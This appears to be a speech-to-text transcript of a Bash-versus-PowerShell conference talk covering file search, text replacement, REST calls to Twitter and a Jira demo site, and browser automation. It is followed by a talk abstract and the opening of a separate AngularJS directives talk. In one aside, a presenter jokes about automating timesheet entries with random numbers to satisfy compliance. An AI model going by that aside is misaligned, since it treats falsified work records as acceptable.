we can say get child item. We can say recurs. Let's see. Let's go to the right folder first, so we'll have some demos, configs. That's a good folder, yeah. So basically we have lots of stuff in here. So I could, whoop, not use find, influenced by Bash here. I could say. That's a good thing. That's a good thing. I like that. You're coming over to the light side, like the light side. List items, get them recursively. I will filter and I could say, yeah, just give me the XML files in all the subfolders. And it scans all the different folders and returns them to me. Takes forever. Well, I did all the XML files, you matched for web configs. Still takes forever. I know. Okay, so let me just throw this in a variable. Let's see, web configs. Let's see if there is any. Web configs. There's a queue. Like a seven or eight or something. Yeah. That path is fast because there's not that many files. But what is really cool here is that actually everything that is returned is an object. So I can use this for my advantage. Here I have properties. These are all full files, system, all file info objects. So they have a full name. So you can see the path. They have the directory name. Let's see. They have the directory, get directories, create subdirectories. And basically you can access whatever you want from the file info object. That's quite useful. Let's find another file. We have the web config in here for replacing. Well, let's do the bash equivalent. We could say cats. So give me the content of web config. And it prints on screen. This can be used with a pipe. Just as in bash. So I can say for each object, I can show you the equivalent proper command for each object. Or we have an alias saying percentage. Let me just go ahead and replace every instance of the string. 
I'm going to replace service bus, for instance, as I can see here, with NDC. Let's see if we got that right. That's interesting. Replace. That's cool. And as you see, the output is now replaced. Perfect. So this is unstructured data manipulation in any file. This can be extended, so I could replace multiple things. If I wanted to continue, I could escape this one and use dash replace again, and keep going: here I could replace service bus, then I could replace emulated, and just keep on replacing multiple keywords. So this is, like I said, unstructured formatting, like in bash. But we also have something really, really cool, which is very powerful. If we wanted structured data, I could cast the content of the config to XML, and now I actually have an XML document. So I can get the members here, and I have the complete DOM structure, the XML document structure. You can manipulate all the nodes, and you can actually invoke methods on the data. Let's see, data dot Save, which takes a file name or a stream. So basically you can manipulate XML files in a structured way really, really fast. It's pretty neat. That's actually a pretty cool thing, I have to admit. The main difference you'll probably see here is that in PowerShell everything is objects. You can access things with dots, you can just say dot something, dot something. In bash, everything is text. Your touchpad interface, your network card interface, everything is text, a stream of text going back and forth. You can do pretty much the same things, but you can't use the dot notation. It has to do with the way bash was built, and with the idea of spreading the responsibility between small commands. Instead of putting everything in one thing and shipping it with batteries included, it gives you lots of small pieces and says: look, everything works, you can put them together the way you want and it will do whatever you want. That's the main difference you will see through the whole presentation. It gives you more manual work as well, if you need to install or configure a lot of third-party things. But sometimes you don't want your computer to make food for you as well when you come home. Well, sometimes you do. Sometimes I kind of wish that. Could you switch the thing? Yeah, sure. I'll just show you one more quick thing with the replacing stuff, a really simple way. As I told you, everything is streams, everything is text in Linux. So you have a stream editor, which is called sed, that does all the replacing for you. I'm not going to explain that much about the options and stuff; just have a look at the man page if you want, or just ask. It's pretty easy, it's practically self-documented. It's cool. So what you do is tell the stream editor to replace something: s for substitute, and then you have this string, my string. Or actually, let's see. You are my grandfather. Oh, nice. It talks. Yeah, PowerShell talks. You can make it talk. I still have my cow. Yeah, it's really nice. But does it talk? It does.
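Pulling the PowerShell search-and-replace workflow together as a sketch (the NDC replacement value is the one used on stage; the web.config node names are just the usual layout and are illustrative):

```powershell
# Find every web.config under the current folder.
$webConfigs = Get-ChildItem -Recurse -Filter web.config

# Unstructured, text-based replace, chained like in the demo.
Get-Content .\web.config |
    ForEach-Object { $_ -replace 'ServiceBus', 'NDC' -replace 'Emulated', 'NDC' }

# Structured manipulation: cast to [xml] and you get a full XML DOM.
[xml]$data = Get-Content .\web.config
$data.configuration                  # walk the nodes with plain dot notation
$data.Save("$PWD\web.config.new")    # Save() takes a file name or a stream
```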
I have, I'll actually show you. It should be somewhere here. No, not it. It's supposed to say this. I have a tiny little dinosaur saying hello or oops. Kind of cute, right? Still, I'm not still going for your dark theme. I'm still giving it cool and like stuff nice and dinosaurs with hats and stuff. Okay, go back to set. Minus something, you would just go like substitute, internet with interwebs, right? Something like that. And then you want to be it like this. And then you say go through all XML files. And wait. I did something wrong. Let's see. It's probably a magic command. It's probably this. Why it's not working. Let's see. So in PowerShell you'd had really easy, complete. Like this. This stuff, that's what I used. I'm going to explain why I used that. I wanted to do this kind of stuff for some HTML files that I'm going to use later. And I wanted to replace that. That's what I used. And that works. But it just says that it's not directory because I think because it is set to, it doesn't like that there are directories there. But that's all right. Let's just move on. And it's actually pretty cool. But it's pretty much the same. The only thing that you might see the difference is the performance. It's the way it works and how fast. And Bash probably is a little bit faster since stuff are a bit more optimized. Can we time that? We can time that. We can actually do that. Let's check it out. But I mean, I'm not really sure about the time. So we can, can you just show real quick how you do that? Because that's kind of, this is kind of a good thing. Let me show you how you do it in Linux. You just do this. And let's see. I have a curl request somewhere here. Curl. Yeah, like this stuff. Let's see. Curl. Oh, good. It was good this year. Curl. This is an example that we're going to be using a little bit further on in the talk. But this is basically something that sends requests, gets adjacent, and parses it in like nice way. So if you want, if I want to see how long time it will take, I will just say time. And it would just give me a statistics how much it took time for kernel time. Yeah, let's look real time. It took me three, three point seven seconds. User and sys. It's like it's how much time it takes in a user user side or system side, which is like system size. That basically kernel time. Sir. Show the same. Show how it works. Let's see. I'm just going to go ahead and switch. Let's see. Clear. And there. So basically here I can use measure command in PowerShell. So measure command just gives you all the data you want for a command. So now I just did the one I did earlier by filtering and getting all the XML files from the catalog. And measuring command, it just gives me how long it took. Seconds, milliseconds, takes, whatever. Yeah. Pretty much the same then. So we could pretty much monitor which one that was. That's good. It's not sufficient, but we would need hardware I guess. We probably need similar hardware and stuff like that. Mine is so much cooler. Yeah, sure. My surface. Sure, sure. So basically another cool feature here is if I wanted to do like 10 of these and measure the exact same commands and getting an average, I could just pipe them all through and I could do pipe to measure commands and I could say, hey, let's measure the objects. Well, measure objects. Property, I could say average property and I could say takes. Let's see. Yeah. It will take a while. Let's just do four of them, three of them. Five. 
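The Bash equivalents being described here, sketched with placeholder paths and URL:

```bash
# In-place substitution across many files; -i edits the files directly.
find Configs -name '*.xml' -exec sed -i 's/internet/interwebs/g' {} +

# Timing a command, as shown with the curl/JSON example.
time curl -s "$url" | python -m json.tool
```

The PowerShell averaging run continues below.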
So basically now I just iterated the expression three times and I've calculated the average property of the ticks. It's quite neat. Awesome. All right. So also for searching files in PowerShell, you have a really nice filter called where object. So we could easily filter, say, give me the files again here. Let's just store these in a variable. So if you want to do the same thing, you would use define for just with a bunch of options and it would do pretty much the same thing. But again, it won't be like objects.something, something, but it would be just options, bunch of options. So this is quite readable. If I say where objects and I could say, go ahead, give me all the XML files, which has file length greater than a thousand. Then it will give me all the XML files that is a certain size. So it's quite neat. That's cool. Looks good. I mean, again, pretty much the same, just a little bit different approach. But yeah. All right. All right. So have you guys tweeted yet? I hope you did. Because the next thing, I mean, it's like since I was talking about interwebs, we're going to go into interwebs and we're going to do some magic stuff on the interwebs. Yep. And show us, show us some cool stuff. Show us what we did. So the intention of making you guys tweet is to see what you guys like the most. If you like PowerShell or if you like Bash and try to get a score. It's not too late to work on it. Just have some sense of battle, I mean. Just tweet. So basically, here in PowerShell, I just wrapped up third-party DLL just to make the O-Wall authentication much easier for me. So basically, I could do this manually, but it's a hassle. So I took a DLL, just imported it, and I set up a Twitter app. And I made some nice little wrappers so I can just do searching, searches for stuff. I can do search next. I can do check if it has more results or not. I'm not sure if you're familiar with the Twitter API. I could also post updates. So I could say, post. Oh, let's include this file. Post update text. Alt status. And easy as low. Let's give me one point. I want another point. So I posted an update so you can get the entire structure from here. But let's get the score. I made a little wrapper saying, search for it in the Z-A-Low PowerShell. And basically, my script now just searches for seven days past and you see it didn't start seven days ago, so it should be fine. And? Unless I invented Time Machine. I'm not too sure about that yet. So there's six counts tweeting our criteria now, which is an easy as low PowerShell. Interesting. If we just, let's try to find your score. Let's rerun it. 11 counts. Come on, guys. Come on. More PowerShell. Awesome, guys. Thank you. Thank you. Thank you so much. Let's wrap it up. I could get the results of who's actually doing it. So we could do some real warfare here. Let's see. I could, let's see. I could get these out, out grid view. See? Ah, here we get the structure. Nice. Nice. So I'm watching you guys. It's really fancy. User interface, of course. Right? Yeah, yeah, definitely. Windows. Yeah, perfect. All right. Anyway, let me just show you real quick because before we go move on. Can you do this in Bash, I mean? Yeah, I can do that. That's what I wanted to show you real quick. I mean, it's like, we're kind of talking too much. But the thing is that, are we on? Yes, perfect. I want to show you something interesting. I mean, it just, I'm not going to show you the whole thing, but I'm going to show you that it's possible to do the same thing. 
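The measuring and filtering commandlets from this part of the demo, as a sketch:

```powershell
# Average the duration of a few identical runs (three, as in the demo).
1..3 | ForEach-Object {
        Measure-Command { Get-ChildItem -Recurse -Filter *.xml }
    } | Measure-Object -Property Ticks -Average

# Filter on any property of the FileInfo objects coming back.
Get-ChildItem -Recurse -Filter *.xml |
    Where-Object { $_.Length -gt 1000 }
```

Back in the talk, the Bash side picks up the Twitter challenge next.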
I mean, since it's a battle, we kind of have to show what can and can't be done. So I have a library that I just downloaded from the internet; another guy wrote that for us. Let's see. Actually, I want to open it in an editor. Then I can say like home. I should replace all your editors. User name. Yeah, sure. That's all right. As long as it's not Visual Studio or something, I'm cool. Let me see. The cool thing is that there is OAuth and streaming OAuth authentication and everything, and it actually works. Let's have a look at Twitter. There we go. So pretty much the same. It looks maybe a little bit more scary, I have to admit that, but it actually works and you can do that kind of stuff. You can use your actual shell to run authentication and get stuff from the internet, from REST, from SOAP, from whatever. And it's actually pretty cool. It's not just your Java or .NET or C# code that is able to do that; you can actually use your shell. Another thing is that, you see, I'm running here on a virtual Ubuntu box, but you could do pretty much the same things in Cygwin, which is like the Windows brother, or stepbrother, of the Bash shell. So Cygwin would be that on Windows, and Pash would be the equivalent on Linux. I mean, it's not fully functional. No, it's not fully functional, but you will get most of the things. It's way better than DOS anyway, as a command line. Nobody uses DOS anyway. Well, nobody. I really hope you guys don't use it, really. Even though you think it looks like DOS. Oh, it does. Still does. All right. Okay. Let's move on from the joy and fun of web services and Twitter and stuff like that. Let's move on to a little bit more work-related stuff, something a bit more serious, right? Something you can actually use in your everyday life, every time you have to do something. So, you already got a sneak peek of what you can use. Most companies, and I guess you guys do this too, use something like Jira for issue tracking. And most of those have a REST interface, right? So what we did was take a random Jira site that was actually hosted by the makers of Jira, the Atlassian guys. They had a demo site up. So we took that, and I made a variable so I don't have to type the whole thing all the time. So what we do is, with that URL, we get the demo project of that thing. We just hit the REST interface and it shows you all the issues for that project. And then you can do stuff with it. You can get the creators, get dates, get status, get whatever. So it's basically only your imagination that stops you from doing all the cool and awesome stuff on the command line. So what I do is say curl this. Look, in PowerShell you would probably do that with built-in stuff; there would be a function that does it for you and shows it and everything. In bash, you actually split it up. So curl just returns me the output, and then I can pipe it: that vertical thing there is the pipe.
You pipe it, you just send the output into another program, which in this case I use Python. I always use, like, look for excuse to use Python. So I did that, of course. So basically what it does, it just prints it in a nice way. What you can do that you can do more with the Python stuff, you can actually, yeah, like this. And then you can do, like, let's see, I have some more stuff here. Curl like this. I do a bit more. I just import some stuff, just what I need for JSON. And I print issues. I look for tag, JSON tag issues. And I would just print all of them and they would just list them. There will be probably a lot of them now. But you can do all that kind of stuff. Yeah, you see it just outputs every old text and then you can look inside and everything is objects. And Python, everything is objects. Then you can actually traverse and do magic and do stuff and do whatever actually you want to do with that. Show us some of the same kind of stuff in PowerShell. Sure. So in PowerShell you don't need external libraries in the same way. No. As long as you have the correct PowerShell version, there's a lot of neat little help features for you that does that. I just wrapped the show score from earlier. So now we can actually search for both. At the same time? At the same time. So now we're equal. There's a 13 count on each. So we're even. All right. I think you fixed it. No, no. We can show who's tweeting afterwards. All right. All right, let's go back to the G-Rack example. Okay, let's go. So basically, in PowerShell you have a nice little commandlet called invoke web requests or you can invoke REST method. Bash guys, you have to tweet more. Sorry, you were saying? I'm just going to scroll up here to the tweets. There we are. Remember to tweet. So invoke REST method. It basically just invokes a regular REST method and it serializes your data. So I can say g-raw URL. I just wrapped the demo URL here. I'm going to say data and invoke the REST method. It's the same URL, right? And then you can see it's actually fetching the stream. So in PowerShell everything as well is a stream. So you can pipe streams through the chain. But what's really, really neat here is that I have actually a JSON serialized structure. So you can just take a look here, data. I get auto completion. So there's issues. There's a lot of issues, apparently. So I'm just going to go ahead and say, let's see, give me the fields, actually. I think those are the ones that are actually, let's see. Here there's a fields property. I can actually just expand this one as well. So I'm just using the data structure I'm getting back to actually filter all this stuff. Interesting. So here are all the fields that's returned from the JSON structure on all the issues. So by using this information I can easily just say, I'm going to select something. I'm going to go ahead and say data issues, fields. Select. I'm going to go ahead and select, well, there's something called summary, I think. At least not summary. Type O. So data issues, fields, fields, and select summary. Summary. Was that right? Yeah. There we go. So now it fetched the summary. I could also go ahead and say, is there a creator? For you non-JR guys, it's basically a description of the issue. Creators. Yeah, there we go. And as you can see, there's a creator object. And I could go ahead and expand that object in my select method so I could expand the creator dot something, dot something. 
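On the PowerShell side, the Jira exploration that was just walked through adds up to something like this (the URL and JQL query are stand-ins for the demo site, and displayName is a typical Jira field rather than one confirmed in the talk):

```powershell
# Fetch issues from the Jira REST API; the response comes back already deserialized.
$jiraUrl = 'https://jira.example.com'
$data = Invoke-RestMethod -Uri "$jiraUrl/rest/api/2/search?jql=project=DEMO"

# Plain property access over the JSON structure, plus a calculated property.
$data.issues.fields |
    Select-Object summary, @{ Name = 'creator'; Expression = { $_.creator.displayName } }
```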
And I could actually make a really neat little list and export this JSON data to any format I want. So basically, if this is a JSON structure, I could easily just say, hey, give me this structure, convert to, and you see order completion. Nice. So convert to CSV, HTML, JSON, secure string, which doesn't make sense in this context. Convert to web application, no. But basically, I have a neat set of conversion methods just to play with the data. So it's quite easy. That's cool. That's right. So that was the small JIRA integration. And usually, that's quite useful if you have continuous integration or you have tasks that needs to be fetched and then combined with other stuff. It can be a really, really nice. Like putting together, for example, like your JIRA tasks with the code you committed or something like that, and you want to pull your commits and you have to put them together in some magic way and do something like that. So that's what kind of things you could do. And that's actually pretty neat. And I use that in my previous project quite a bit because where I wanted to see who committed what and what time and what kind of things we deliver whenever we do delivery, what kind of commits and what kind of JIRA cases issues that we're actually delivering and stuff like that. So it's actually pretty cool. It's actually good, useful stuff. Yeah. But also, another really annoying thing during your everyday life is working log hours. And just as a small example, I have this really neat little site which I proxied. It's one site I worked with earlier and I proxied it to local hosts. And it's not working in any other thing than IE. Oh, god. This is the fun part. So basically, if I pull this one up in Chrome, it shows me this. It works in PowerShell, right? Well, yeah, well, of course. Well, no. This is the thing I'm going to show you. If you have a really painful website, which only, well, is this IE? Yeah, this is IE. Wow, that's great. It doesn't work in the URL. I copied the URL. Oh, perfect. It's quite bad. So if I go here, it's working in IE. And in Chrome, it's not working. And this is a really great system. You have to manually register your work hours every freaking day. And it requires a username. There's no auto completion. It requires you to input the date and the project number. And there is really no help in this interface at all. No. And of course, you need to submit every day. So I could easily automate this. I could use something like Casper or a third-party integration tool, which might work, but no guarantees. Probably will. Yeah, if you tweak the headers a little bit and says that you are IE. But I could actually on Windows use the IE com object just because I like pain. It is a lot of pain. So I could say, I could go ahead and create a new object. I'm going to say com object and Internet Explorer, Internet Explorer application. I'm just going to go ahead and close this one. Oh, application. So save that and let's run that one. Now I have IE. So it's a com object. Wow. Wow. Yeah. It's amazing. Nice. It's a mess. Well, I mean, I think common com objects are bad enough. So I don't want to go back to any further. So by using the IE object, I could say navigate to. I could go ahead and say local hosts. I'm just going to go ahead and do this. I'm going to copy this to my scripts. So navigate to local host and I'm going to say IE visible equals true. So this is a really, really simple workflow so far. So executed and I have IE running in the background there. Oh, yeah. There we are. 
Oh, where did it go? There we are. So small little window. It doesn't really matter. But what I could do is I could say IE documents. I could say get element by ID, username, value. I could say my username. If this works, oh. Well, it's probably a typo somewhere. Value, text, text or value, value. I can't remember the DOM structure. Maybe something like this. Yeah, there we go. All right. So it set my value. Nice. So just by invoking these really small com object commands and using the DOM tree back, I could automate this process every day. And I could put it up as a scheduled task running every day at four just by inputting some data. For instance. Just random numbers. Just random numbers just to make the compliance work. There are a few people just like the numbers. So basically, how would you do this in Bash? Well, maybe not for the IE object. No, definitely not going to do it for IE objects really. It's, I don't want to do that. But anyway, but what I can do is to do it a bit more generic way. I have, let me start my little proxy here. I also created a tiny little proxy. And I kind of was looking for an example. And I was like, yeah, well, you have your hours thing, which is kind of, that would be lame to use the same. So I kind of wanted to find something else. So I thought of, I have a gym. I go to gym. I like to go there and they have classes and they have a system that kind of sucks a little bit. I mean, you have to sign up for the classes week before. And if you do that like five days instead of seven days before, it's probably everything is full and you have to wait and see and you know that kind of stuff. So what I did is just I made a proxy. I created a kind of a local version of that and I anonymized the whole thing. So you probably hopefully won't know what gym it is. Political reasons. For some political and legal reasons and kind of I don't want to get sued reasons. I also anonymized the whole names and everything. So basically it's like this and then you have your, so it's in a region, but basically it's a your center. Try a workout like gym set thing and then you go for like, okay, I want to go to this and I want to select, I want to go from Tuesday and it's like, oh, they have spinning on at seven o'clock in the morning. That's perfect. That's what I want to do in the morning before work. Sounds like good plan. Right. And then you sign in and okay, it says like, yeah, you're registered now. Right. So basically what you guys can do, I can just create a list of stuff and say that I want you to actually sign me up for those and those and those. And those classes. And that would be actually really cool. Right. So what I did is do to do it a little bit more generic way. You mentioned actually already Casper Casper jazz and I actually did that. I mean, again, I mean, I don't have anything built in. So I have to improvise. And that's what I did. And I created. Let's have a look at it. I think it's called sample. I created a tiny little file that does really simple stuff. I mean, it's like, that's not what you normally would do. But still, it basically would go and find, let's go to the top. This stuff would just turn on some debug. I removed that. But this is kind of a good thing to know. You can actually add some verbose mode and debugging and stuff. What would do what you want to do? It's like you go to your L and then you go like you set the size of your window. Just for fun of it. Because it's not a browser, so it doesn't know how big it is and stuff. 
Then you go to the first drop down. You select some kind of thing. You change it. The first drop down, you remember the center, right? Name of the center because they have different ones. Then the second drop down would be like a date. And I select some kind of date. And then I'll just click on a button. And let's see if I run that thing and see if demo effect actually, I hope it works. Well, I hope demo effect doesn't work, but I hope the script works. So let's see. All right. And what it did, I didn't show you that. At the end here, it actually takes a screenshot of how page would look. So if everything was right, there should be a page of like congratulations. You've been signed up for a course. So let's see. It is in development and battle. And there should be a screenshot. It is. And it is new, right? I mean, how, yeah, look, I've been booked. I have booked the spinning thing. And just see when it was created just to see that I didn't cheat or anything. Yeah, it's now. It's like 1714. That's right. Modified. Initiation termination sequence. All right. All right. That's kind of interesting. That was actually kind of a hint of what we have to do because we don't have that much time now. Notice the middle launcher. We're not going to get. Don't go there. Don't go there, really. So we thought it wouldn't be a battle unless we have some gadgets shooting at each other. So basically, we do what we did was actually, I basically added a DLL using the windows 8.1 USB hub library. So I hooked up this neatly USB missile launcher and then I had to think what should I use for something that contracts like a missile thing. Right. And then I thought like there are some guys that thought about that before and they almost hit me. Actually, I thought of you're going to need those. Yeah, probably going to need those for now. Then I thought like what kind of country, well, some kind of country that should not be named anyway, but that use something to contract missiles and everything. So I went for drones. Right. Let's see. Well, actually, you guys in the first row, we should practice like ducking. Just in case it goes towards you, just should we practice or you're cool? No, you're right. Perfect. Let me see. And then, of course, I mean, like it wouldn't be like a command line battle if we wouldn't use that stuff from command line. Right. So what we're going to do, we're going to actually control both of those things from command line. He's going to do it from poor shell. I'm going to control that thing from Bash. And I'm going to be, I'm going to go nice on you and I'm just going to do what I'm going to do is just go up, stay there, Hoover for a little while and just go down. All right. So then you have to hit it. That's right. Maybe your laptop is in the way. Yeah, we'll see. We'll see. I can do that. It's all right. Yeah, I can move. And let's see, do you want to switch just to show people what I'm actually doing? Sure. Okay. All right. I have a tiny little JavaScript here that would actually control the whole thing. And then I'm going to do like node. I'm using node.js for that. And drone. Remember ducking, right? Just go down. Just to be safe. Play dead, basically. If anything goes wrong, just play dead. Let's see. The moment of truth. You ready? Yeah. Die bash. Let's see. Oh, close. That's a miss. Oh, that's the wrong way. That's the wrong way. That's a miss. And miss again. No. It's landing. Too late. I can do it again. Move down. It's okay. I can do that again. I can shoot while it's down. 
No, it's not fair to shoot when it's down. Come on. Yeah. Well, I would probably wrap it up now. All right. I have three more missiles. I could probably hit it. Shoulda, coulda, woulda. But it just illustrates the point: you can easily integrate anything you want, and that's the power of the shell. At the end, I really want to show you this one. It's really cool. That's how you can convert your server into a cuckoo clock. It just ejects the CD-ROM tray; you have to have a CD-ROM drive, of course. You see, it's an eject of the CD-ROM, and then it makes the cuckoo sound. So imagine somebody walking into the server room and it's just cuckooing there, you know. That would be so awesome. I just had to show you. Anyway, we're done. Wait, we have to show the score. Let's see. Come on, tweets. Is there any score? Let's run this thing. Oh, I'm so excited. Oh, haha! 16-16. Oh, God. That's a good fight, then. Alright. Nicely done. Well done. Thank you. That concludes it. So, if you have any questions, feel free to ask. That's my email and my Twitter. I'll post my Twitter. I'll show you mine. And you can easily find my email; it's on the start of the slides anyway. And I can switch, you can switch, and then I can show people my contact information as well. It's there. Just for the record, that's my Twitter and my email. Remember to vote: green, yellow, or red, depending on how you liked the talk. Yes. If you have any questions, feel free to come up here or just ask. Thank you. Thank you. Thank you.
|
Are you a Ninja or a Samurai? Ever wondered if you could switch from old-school Bash to a newcomer PowerShell? Or the other way around? Could one of them be as effective at the other one? Perhaps even better or easier to master? Want to find out? Come and see the epic dance off of a Bash command line ninja and PowerShell samurai. Find your favourite scripting platform, by watching us solve real-world problems using the two!
|
10.5446/50864 (DOI)
|
Good afternoon everybody. Good afternoon, I say. There we go. My name is Scott. I'd like to talk to you about directives for AngularJS. I'm kind of assuming that you might have worked with AngularJS already just a little bit, so you know some of the basics. But I want to drill into a specific area of AngularJS, the area that I find most difficult, found most difficult, well, there's still mysteries in there, writing directives for AngularJS, because I found it very easy to create controllers, services, manipulate scope, do data binding, ng-model, all that stuff. When it came to directives, every time I looked at the source code to directives or looked at someone else who is writing a directive, I found some new mysterious feature. So directives are beautiful, but they have some of the most terse shortcuts and syntax that you have to get used to and just magic behavior sometimes. So I actually want to give you two different perspectives on directives, because I believe there's two different ways to look at them. One way is that you can use directives to build this beautiful universe, which is the idyllic Norwegian landscape you see on one half of the screen. That is, you can use directives to make your markup, the code that you write in HTML a little bit prettier, a little more orientated towards the way you think and the way your team thinks and the UX problems that you're trying to solve. And then there's this other world of directives, which I'll also talk about, which you might never experience this, but directives really are the machinery that is in the basement of the building where it's very hot and greasy and no one really wants to be there, but it's what makes the whole thing work. So only the plumbers and the mechanics, like being in that room with all the machinery. But there are pieces of directives that operate that way, too. I mean, the entire form validation capabilities and the way NG model works with a form in Angular is quite amazing, but it's all this plumbing that is down there. We'll focus on the pretty scene first. The way I view this is that if you've ever heard of the code smell primitive obsession, it's about when you're using a language like C-Sharp, but you are representing your domain concepts using simple built-in primitives. So if I'm in a distributed messaging system, I'm modeling messages with a string. If I'm building something that needs to keep track of monetary values, I'm storing those values in a decimal. And that's all well and good until you reach a certain level of complexity. And then you realize that, oh, I have to know whether that's in this currency, or is it euros, is it US dollars? I don't know. It's just in this decimal. What is it? As HTML developers, we have a primitive obsession when we're building the UI, because all we have is primitives. We have things like divs. So everything becomes a div. And even though HTML5 introduced some new semantic markup, and I can have a header and a footer and sections and articles, all those wonderful things, most of what I write still comes out to be divs. I put divs inside of divs to create, sometimes, using bootstrap classes to create rows and columns. But yeah, it's all divs. Directives allow you to escape from that. And they're a very forward-looking part of AngularJS because the Google people that started AngularJS, they knew what specifications were coming down the road. And they wanted to orientate themselves towards those specifications. 
So if you look at specifications surrounding custom elements, web components, shadow DOM, these are things that directors are trying to give us in our applications and inside the browser today, until some point when all these newer specifications are finalized and they're in the browsers and our grandchildren are building web applications, they'll be able to actually use those standards. But until then, that was supposed to be funny. Thank you. There's things like Polymer. If you've heard of it, they allow you to build web components. There's X tags, which allow you to simulate web components. And then there's Angular. It's part of its pitch line. We're going to enhance your HTML. So how do they enhance your HTML? Well, let's take a look at this scenario where I have a div that I want to represent some alert that's going to be displayed to the user. And I'm using bootstrap.css. So I say this is a div. Class equals alert, alert-warning, alert-dismissable. Because I want it to be formatted a certain way and have a certain color and give the ability to the user to click on a button to make it go away. But when you look at that, it's all well and good that bootstrap uses this. They pretty much apply the single responsibility principle to CSS rules. So it's not just enough to give it a class of alert, because that only does some things. I have to be very specific and say class alert, alert-warning. But what if I could write it like this? What if I could just say alert-type equals warning and then include the content that I want? That can be nicer in many scenarios. If I wanted to do something like that today in an Angular application, that's when I would write a custom directive. And just so you know, the exercise that we're about to go through is to build something that works like that, so I can just write alert in the HTML. But it's already been built. You don't have to do this from scratch. I just think it's a nice example. There are already a couple Angular modules out there, Angular UI, that already wrap a lot of bootstrap. So you can just write accordions or alerts in your HTML and direct this, pick it up, and make things work. So let's jump into Visual Studio. And in my index.html, here's the bootstrap alert. Let me copy that and bring that here inside of the markup, inside of something that's contained in an alerts controller. And this is where I want to change this to just be an alert type equals warning. Get rid of all this class stuff. Yes, I still might want a button with the class of close so that it appears on the right. But I don't want to use bootstrap.js and jquery.js. If you've ever used bootstrap and you want things that are dismissible, you have to include those additional files, bootstrap.js and jquery.js. I just want to make it all work with Angular. So I want to build some sort of alert, and I want this warning to appear inside of it. And let's just see what it looks like now. So there's the bootstrap alert on the top, and then there's my alert, which isn't colored correctly and doesn't close when I click on the button. So the first thing we have to do is tell Angular that when you compile the markup in the DOM, you should be looking for an element with the name of alert. And the way we do that is by writing a directive. I already have an app.js file that is the module that is in effect for my HTML page. I have a controller on there. It doesn't do anything as yet. But now I need to write a directive called alert, so that's what Angular will look for. 
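The markup change being described in index.html amounts to roughly this, with a placeholder message:

```html
<!-- The plain Bootstrap way: every class spelled out by hand -->
<div class="alert alert-warning alert-dismissable">
  <button type="button" class="close">&times;</button>
  This is a warning.
</div>

<!-- What the custom directive should let us write instead -->
<alert type="warning">
  This is a warning.
</alert>
```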
And I need to write a function so that when Angular is bootstrapping, it will invoke that function and get back what is known as the directive definition object, the DDO. Excuse me. It is what describes the capabilities and the behavior of alert to Angular. So it knows what to do when it sees that element in the HTML. And one of the things you can put inside of here is a template. So I could say template is a div. And let's just say for right now, I'm going to write out simple text, hello, NDC, or I guess this is a warning. Warning from NDC. Don't trust the Wi-Fi Troy hunts around somewhere with one of those pineapple devices. But is this going to work yet? No. Because by default, Angular directives, it only looks for attributes in HTML. It doesn't look for them as an element. So in other words, if I did a div alert, that would work. But I want it to be alert proper element type here. I do that with the restrict clause here. So I can say restrict this to elements and attributes. Make it work either way. It's just a shorthand syntax. So E for element, A for attribute. There's also C for class, which is quite interesting. Because if you say, I want to make this directive wire up to wherever a class equals alert appears, that can be quite effective with integrating with existing CSS that you might have, or existing libraries, or jQuery plugins that you're trying to replace. There's also M for HTML comment. But as far as I know, no one really uses that. So just pretend you didn't even see that. We're just going to stick with elements and attributes. And now, hopefully, if everything is working correctly and I refresh this, now my element is replaced with that template, which is warning from NDC. But most of us, well, there's many directives where you just can't inline the HTML. It's kind of messy, right? So I can also specify template URL, cut this out of here, and say, no, actually, you need to go to alert.html, which is a file I already have in this project. I'll just come over to alert.html, paste this in here without the double quotes. And just so we know things are working and it's updated, yes. So we pulled in that template. All right, so so far, I'm going to flip back to the slides for a second, just so I don't get lost. We've learned about restrict. What type of things should Angular be looking for in the HTML to instantiate and use this directive? And this is how I could write it also. Alert is an attribute now if I restrict to ENA. And we've learned about templates. So I can specify a template URL. And one thing that people commonly ask me about is when I'm running my Angular application, I see a dozen network request go off on the first page load for all of these little directive templates. Is there a way to prevent that? Well, if you look at node tools, specifically, there's a grunt task and a gulp task that can actually precompile all of your HTML templates together, spit out a JavaScript file for you that you load into the web page, and it will automatically deliver all of your templates at once from that JavaScript file, automatically puts them all into a cache factory that Angular calls $templatecache. So it doesn't have to do a lot of network requests for these small bits of HTML. So just a tip there if you're ever trying to optimize an application. Let's talk about transclusion. Transclusion is fun, funny, because it's one of those words that people used to pick on with Angular. They're like, transclusion, it's not even in the dictionary. 
What are you doing building this framework that's so weird? But it is in Wikipedia, by the way. Transclusion is just a term for saying, I want to lift the content of one document. Let's say this content. I'm going to lift it out of there and put it inside of something else. And that's what I want to do here. I want to be able to allow the user or the developer to write alert and then include whatever content they want. But I need to get whatever they want inside of there into my template somewhere. That's the goal. It's very easy with Angular because I can come into app.js. And first of all, I will set a flag. Transclusion is true. That tells Angular that transclusion is going to happen. And then in my template, I just need, instead of making up my own stuff, I'll use what the user said, which is ng transclude. And actually, now that I think about it, I don't think this is transclusion. This is transclude. Yes. So now I have successfully transcluded the content out here into there. And just so it looks different from the one above, let's say this is the Angular directive, which is spelled something close to that. So far, so good. So that's transclusion, very simple. Oh, yes. Thank you for letting me know. This is not large enough. Is that better? Thank you. So transclusion, there's actually two ways to do this. There's the easy way and there's the hard way. If you just place an element inside of your template that uses the ng-transclude directive, that is where the content will be placed into. Angular also has the concept of a transclusion function. If you have to do something really fancy when you transclude stuff, you want to manipulate that markup, you want to break it apart and put it in different places, that's where in the linking function, which we'll talk about later, you can ask for the transclusion function that you invoke and it will give you back all those pieces inside an array of strings. All right. Next stop it. Yeah, let's talk about link. So what do we not have working so far? Well, we don't have the colors. We don't have the ability to click this to close it. So one of the things that you can do with directives that you really shouldn't do anywhere else is manipulate the DOM directly by walking up and touching an element. So the link function that you provide is part of a directive definition object can include scope, element, and attributes automatically. That's not injectable like a lot of functions in Angular. Those are the set parameters that come to you. Scope, which is the current scope that you're operating with, by default, that scope is going to be the same scope as my controller that is outside that directive. The element, which is literally the HTML element that I'm operating with, it's wrapped with the JQLight API. If you haven't worked with Angular before, it offers an API around this element, which is very similar to JQuery's API when you wrap a DOM element with JQuery, but nearly as many methods and not nearly as many features. It's like the 20% of JQuery that you use 80% of the time. So yes, I can do things with this element like add class. So let's add a class of alert. And I would probably also need to add alert dash plus warning, but I want that to be parameterized. For right now, it's just hard coded. See if this works, because I think there's one more change I may have to do. But you understand where I'm going so far, right? I don't want the user to have to type class equals alert or anything that. I'm going to add it myself. 
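At this point in the demo the directive adds up to roughly the following sketch (the module name app is an assumption):

```javascript
angular.module('app').directive('alert', function () {
  return {
    restrict: 'EA',            // match <alert> elements and alert="" attributes
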